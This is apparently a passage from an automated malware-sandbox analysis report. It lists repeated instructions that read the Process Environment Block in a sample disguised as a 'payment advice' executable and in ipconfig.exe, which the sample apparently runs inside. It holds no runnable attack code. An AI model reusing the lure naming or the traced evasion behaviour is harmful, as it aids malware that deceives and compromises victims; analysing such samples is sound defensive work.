Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B849B mov eax, dword ptr fs:[00000030h]	10_2_1E3B849B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E426CF0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E426CF0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E426CF0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9080 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9080
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4614FB mov eax, dword ptr fs:[00000030h]	10_2_1E4614FB
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E423884 mov eax, dword ptr fs:[00000030h]	10_2_1E423884
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E423884 mov eax, dword ptr fs:[00000030h]	10_2_1E423884
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A58EC mov eax, dword ptr fs:[00000030h]	10_2_1E3A58EC
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E423540 mov eax, dword ptr fs:[00000030h]	10_2_1E423540
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	10_2_1E3D4D3B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	10_2_1E3D4D3B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]	10_2_1E3D4D3B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D513A mov eax, dword ptr fs:[00000030h]	10_2_1E3D513A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D513A mov eax, dword ptr fs:[00000030h]	10_2_1E3D513A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]	10_2_1E3AAD30
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]	10_2_1E3B3D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]	10_2_1E3C4120
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9100
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9100
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9100
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AB171 mov eax, dword ptr fs:[00000030h]	10_2_1E3AB171
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AB171 mov eax, dword ptr fs:[00000030h]	10_2_1E3AB171
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CC577 mov eax, dword ptr fs:[00000030h]	10_2_1E3CC577
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CC577 mov eax, dword ptr fs:[00000030h]	10_2_1E3CC577
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AC962 mov eax, dword ptr fs:[00000030h]	10_2_1E3AC962
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]	10_2_1E3C7D50
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478D34 mov eax, dword ptr fs:[00000030h]	10_2_1E478D34
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E42A537 mov eax, dword ptr fs:[00000030h]	10_2_1E42A537
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CB944 mov eax, dword ptr fs:[00000030h]	10_2_1E3CB944
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CB944 mov eax, dword ptr fs:[00000030h]	10_2_1E3CB944
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]	10_2_1E3E3D43
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E3D1DB5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E3D1DB5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E3D1DB5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E426DC9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]	10_2_1E3D35A1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D61A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D61A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]	10_2_1E3DFD9B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]	10_2_1E3DFD9B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4341E8 mov eax, dword ptr fs:[00000030h]	10_2_1E4341E8
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2990 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2990
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	10_2_1E3A2D8A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	10_2_1E3A2D8A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	10_2_1E3A2D8A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	10_2_1E3A2D8A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]	10_2_1E3A2D8A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E458DF1 mov eax, dword ptr fs:[00000030h]	10_2_1E458DF1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA185 mov eax, dword ptr fs:[00000030h]	10_2_1E3DA185
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2581
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2581
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2581
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2581 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2581
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CC182 mov eax, dword ptr fs:[00000030h]	10_2_1E3CC182
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E3AB1E1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E3AB1E1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E3AB1E1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]	10_2_1E3BD5E0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]	10_2_1E3BD5E0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4269A6 mov eax, dword ptr fs:[00000030h]	10_2_1E4269A6
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4705AC mov eax, dword ptr fs:[00000030h]	10_2_1E4705AC
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4705AC mov eax, dword ptr fs:[00000030h]	10_2_1E4705AC
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4251BE mov eax, dword ptr fs:[00000030h]	10_2_1E4251BE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4251BE mov eax, dword ptr fs:[00000030h]	10_2_1E4251BE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4251BE mov eax, dword ptr fs:[00000030h]	10_2_1E4251BE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4251BE mov eax, dword ptr fs:[00000030h]	10_2_1E4251BE
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00566577 mov eax, dword ptr fs:[00000030h]	10_2_00566577
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00566DD1 mov eax, dword ptr fs:[00000030h]	10_2_00566DD1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_005639D1 mov eax, dword ptr fs:[00000030h]	10_2_005639D1
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00567B79 mov eax, dword ptr fs:[00000030h]	10_2_00567B79
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_00567B34 mov eax, dword ptr fs:[00000030h]	10_2_00567B34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360DB60 mov ecx, dword ptr fs:[00000030h]	19_2_0360DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361F370 mov eax, dword ptr fs:[00000030h]	19_2_0361F370
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361F370 mov eax, dword ptr fs:[00000030h]	19_2_0361F370
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0361F370 mov eax, dword ptr fs:[00000030h]	19_2_0361F370
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B7A mov eax, dword ptr fs:[00000030h]	19_2_03633B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B7A mov eax, dword ptr fs:[00000030h]	19_2_03633B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360DB40 mov eax, dword ptr fs:[00000030h]	19_2_0360DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D8B58 mov eax, dword ptr fs:[00000030h]	19_2_036D8B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0360F358 mov eax, dword ptr fs:[00000030h]	19_2_0360F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B5A mov eax, dword ptr fs:[00000030h]	19_2_03633B5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B5A mov eax, dword ptr fs:[00000030h]	19_2_03633B5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B5A mov eax, dword ptr fs:[00000030h]	19_2_03633B5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03633B5A mov eax, dword ptr fs:[00000030h]	19_2_03633B5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A309 mov eax, dword ptr fs:[00000030h]	19_2_0362A309
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C131B mov eax, dword ptr fs:[00000030h]	19_2_036C131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036303E2 mov eax, dword ptr fs:[00000030h]	19_2_036303E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036B23E3 mov ecx, dword ptr fs:[00000030h]	19_2_036B23E3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036B23E3 mov ecx, dword ptr fs:[00000030h]	19_2_036B23E3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036B23E3 mov eax, dword ptr fs:[00000030h]	19_2_036B23E3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03601BE9 mov eax, dword ptr fs:[00000030h]	19_2_03601BE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362DBE9 mov eax, dword ptr fs:[00000030h]	19_2_0362DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036853CA mov eax, dword ptr fs:[00000030h]	19_2_036853CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036853CA mov eax, dword ptr fs:[00000030h]	19_2_036853CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036353C5 mov eax, dword ptr fs:[00000030h]	19_2_036353C5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1BA8 mov eax, dword ptr fs:[00000030h]	19_2_036C1BA8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D5BA5 mov eax, dword ptr fs:[00000030h]	19_2_036D5BA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03634BAD mov eax, dword ptr fs:[00000030h]	19_2_03634BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03634BAD mov eax, dword ptr fs:[00000030h]	19_2_03634BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03634BAD mov eax, dword ptr fs:[00000030h]	19_2_03634BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D9BBE mov eax, dword ptr fs:[00000030h]	19_2_036D9BBE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D8BB6 mov eax, dword ptr fs:[00000030h]	19_2_036D8BB6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036AEB8A mov ecx, dword ptr fs:[00000030h]	19_2_036AEB8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036AEB8A mov eax, dword ptr fs:[00000030h]	19_2_036AEB8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036AEB8A mov eax, dword ptr fs:[00000030h]	19_2_036AEB8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036AEB8A mov eax, dword ptr fs:[00000030h]	19_2_036AEB8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C138A mov eax, dword ptr fs:[00000030h]	19_2_036C138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363138B mov eax, dword ptr fs:[00000030h]	19_2_0363138B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363138B mov eax, dword ptr fs:[00000030h]	19_2_0363138B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363138B mov eax, dword ptr fs:[00000030h]	19_2_0363138B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036BD380 mov ecx, dword ptr fs:[00000030h]	19_2_036BD380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03611B8F mov eax, dword ptr fs:[00000030h]	19_2_03611B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03611B8F mov eax, dword ptr fs:[00000030h]	19_2_03611B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0363B390 mov eax, dword ptr fs:[00000030h]	19_2_0363B390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03632397 mov eax, dword ptr fs:[00000030h]	19_2_03632397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03604B94 mov edi, dword ptr fs:[00000030h]	19_2_03604B94
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362EB9A mov eax, dword ptr fs:[00000030h]	19_2_0362EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362EB9A mov eax, dword ptr fs:[00000030h]	19_2_0362EB9A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036BB260 mov eax, dword ptr fs:[00000030h]	19_2_036BB260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036BB260 mov eax, dword ptr fs:[00000030h]	19_2_036BB260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03645A69 mov eax, dword ptr fs:[00000030h]	19_2_03645A69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03645A69 mov eax, dword ptr fs:[00000030h]	19_2_03645A69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03645A69 mov eax, dword ptr fs:[00000030h]	19_2_03645A69
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036D8A62 mov eax, dword ptr fs:[00000030h]	19_2_036D8A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0364927A mov eax, dword ptr fs:[00000030h]	19_2_0364927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609240 mov eax, dword ptr fs:[00000030h]	19_2_03609240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609240 mov eax, dword ptr fs:[00000030h]	19_2_03609240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609240 mov eax, dword ptr fs:[00000030h]	19_2_03609240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03609240 mov eax, dword ptr fs:[00000030h]	19_2_03609240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1A5F mov eax, dword ptr fs:[00000030h]	19_2_036C1A5F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036CEA55 mov eax, dword ptr fs:[00000030h]	19_2_036CEA55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03694257 mov eax, dword ptr fs:[00000030h]	19_2_03694257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03604A20 mov eax, dword ptr fs:[00000030h]	19_2_03604A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03604A20 mov eax, dword ptr fs:[00000030h]	19_2_03604A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_036C1229 mov eax, dword ptr fs:[00000030h]	19_2_036C1229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03644A2C mov eax, dword ptr fs:[00000030h]	19_2_03644A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03644A2C mov eax, dword ptr fs:[00000030h]	19_2_03644A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362A229 mov eax, dword ptr fs:[00000030h]	19_2_0362A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_0362B236 mov eax, dword ptr fs:[00000030h]	19_2_0362B236
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03608239 mov eax, dword ptr fs:[00000030h]	19_2_03608239
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03608239 mov eax, dword ptr fs:[00000030h]	19_2_03608239
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03608239 mov eax, dword ptr fs:[00000030h]	19_2_03608239
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03618A0A mov eax, dword ptr fs:[00000030h]	19_2_03618A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605210 mov eax, dword ptr fs:[00000030h]	19_2_03605210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 19_2_03605210 mov ecx, dword ptr fs:[00000030h]	19_2_03605210
